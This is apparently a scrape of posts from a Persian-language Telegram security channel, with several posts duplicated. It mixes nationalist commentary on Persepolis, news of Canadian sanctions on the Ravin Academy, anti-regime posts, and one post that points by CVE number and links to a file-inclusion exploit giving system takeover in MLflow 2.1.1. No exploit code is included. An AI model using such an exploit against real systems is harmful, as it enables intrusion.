ﺍﻣﺎ ﺑﺮﺧﻮﺭﺩ ﺑﺮﺧﻰ ﺍﺯ ﻣﺎ ﺍﻳﺮﺍﻧﻴﺎﻥ، ﺑﻪ ﻭﻳﮋﻩ واپسگرایان ﻭ ﺑﺮﺧﻰ ﻣﺪﻋﻴﺎﻥ ﺭﻭﺷﻨﻔﻜﺮﻯ، ﺑﺎ ﺍﻳﻦ ﺍﺛﺮ ﺑﺰﺭﮒ ﻫﻨﺮﻯ ﺟﻬﺎﻥ ﺑﺴﻴﺎﺭ ﻏﻴﺮﺩﻭﺳﺘﺎﻧﻪ ﻭ ﻧﺎﺑﺨﺮﺩﺍﻧﻪ ﺑﻮﺩﻩ ﺍﺳﺖ.
ﺩﺭ ﺗﺨﺖ ﺟﻤﺸﯿﺪ ۳۲ ﻫﺰﺍﺭ ﻟﻮﺡ ﮔﻠﯽ ﺑﺪﺳﺖ آﻣﺪﻩ ﮐﻪ ﺩﺭ ﺍﻥ ﺷﺮﺡ ﻭﻗﺎﯾﻊ ﺭﻭﺯﺍﻧﻪ ﺭﺍ ﺩﺭ ﻣﺮﺍﺣﻞ ﺳﺎﺧﺖ ﺍﯾﻦ ﺑﻨﺎﯼ ﺑﺎﺷﮑﻮﻩ ﺑﯿﺎﻥ ﻣﯿﮑﻨﺪ ﺑﺎ ﺗﻤﺎﻡ ﺟﺰﺋﯿﺎﺕ ﻣﺜل ﺍﯾﻨﮑﻪ ﮐﺎﺭﮔﺮﺍﻥ و ﻣﻬﻨﺪﺳﺎﻥ ﻫﺮ ﮐﺪﺍﻡ ﺑﻪ ﻧﻮﻉ ﺗﺨﺼﺼﯽ ﮐﻪ ﺩﺍﺭند ﭼﻪ ﻣﯿﺰﺍﻥ ﺣﻘﻮﻕ ﺩﺭﯾﺎﻓﺖ ﻣﯿﮑﻨﻨﺪ،
*ﮐﺸﻮﺭﻫﺎﯼ ﺩﺍﻋﯿﻪ ﺩﺍﺭ ﺣﻘﻮﻕ ﺑﺸﺮ ﺑﻪ ﭼﻪ ﭼﯿﺰﯼ ﻣﻔﺘﺨﺮﻥ ﻭ ﻣﺎ ﭼﻪ ﭼﯿﺰﯼ ﺭﺍ ﻟﻌﻦ ﻭ ﻧﻔﺮﯾﻦ ﻣﯿﮑﻨﯿﻢ ﻭ ﻧﻤﺎﺩﯼ ﺍﺯ ﻇﻠﻢ ﻭ ﺳﺘﻢ ﺟﺒﺎﺭﺍﻥ ﻭ ﺳﺘﻤﮕﺮﺍﻥ ﺭﻭﺯﮔﺎﺭ ﻣﯿﺪاﻧﯿﻢ*.
ﺑﺎﻭﺭ ﮐﻨﯿﺪ ﻫﯿﭻ ﻣﻠﺘﯽ ﺩﺭ ﺩﻧﯿﺎ ﭼﻨﯿﻦ ﮐﻤﺮ ﺑﻪ ﺗﺨﺮﯾﺐ ﻫﻮﯾﺖ ﻭ ﻣﻠﯿﺖ ﻭ ﺗﺎﺭﯾﺦ ﺧﻮﺩ ﻧﺒﺴﺘﻪ ﮐﻪ ﻣﺎ ﺑﺴﺘﻪ ﺍﻳﻢ.
ﺩﺭ ﺍﻧﮕﻠﺴﺘﺎﻥ کاسه ﺳﯿﺼﺪ ﺳﺎﻟﻪ ﭘﯿﺪﺍ ﻣﯿﺸﻮﺩ ﻭ ﺭﺳﺎﻧﻪ ﻫﺎﻳﺸﺎﻥ ﮔﻮﺵ ﺩﻧﯿﺎ ﺭﺍ ﮐﺮ ﻣﯿﮑﻨﻨﺪ
ﻭلی ﻣﺎ ﺗﭙﻪ ﻫﺎ ﻭ ﻣﺤﻮﻃﻪ ﻫﺎﯼ ۷۰۰۰ ﺳﺎﻟﻪ ﮐﻪ ﻣﺪﻧﯿﺖ ﺩﻧﯿﺎ ﺩﺭ آﻥ ﻣﺘﻮﻟﺪ ﺷﺪﻩ ﺭﺍ ﺑﺎ ﻟﻮﺩﺭ ﺗﺨﺮﯾﺐ ﻣﻲ کنیم !!
ﺗﻔﺎﻭﺕ
*ﺍﯾﺮﺍﻥ ﻭ ﺍﺭﻭﭘﺎ!!!*
ﺗﻔﺎﻭﺕ
*( ﺗﺨﺖ ﺟﻤﺸﯿﺪ ) ﺑﺎ( ﮐﻮﻟﻮﺳﯿﻮﻡ)*
@pfksecurity
آکادمی راوین وابسته به وزارت اطلاعات امروز توسط دولت کانادا تحریم شد.
#راوین #آکادمی_راوین #تحریم
@PfkSecurity
#راوین #آکادمی_راوین #تحریم
@PfkSecurity
#CVE-2023-1177:
هک هوش مصنوعی
- کنترل سیستم و ابر از طریق MLflow Exploit (LFI/RFI در MLflow 2.1.1)
https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/
https://protectai.com/blog/hacking-ai-system-takeover-exploit-in-mlflow
@PfkSecurity
هک هوش مصنوعی
- کنترل سیستم و ابر از طریق MLflow Exploit (LFI/RFI در MLflow 2.1.1)
https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/
https://protectai.com/blog/hacking-ai-system-takeover-exploit-in-mlflow
@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
فریدون فرخزاد و رسیدن به هویت ملی
بشنویم از زبان جاویدنام #فریدون_فرخزاد
#نه_به_اسلام
#نه_به_جمهوری_اسلامی
@PfkSecurity
بشنویم از زبان جاویدنام #فریدون_فرخزاد
#نه_به_اسلام
#نه_به_جمهوری_اسلامی
@PfkSecurity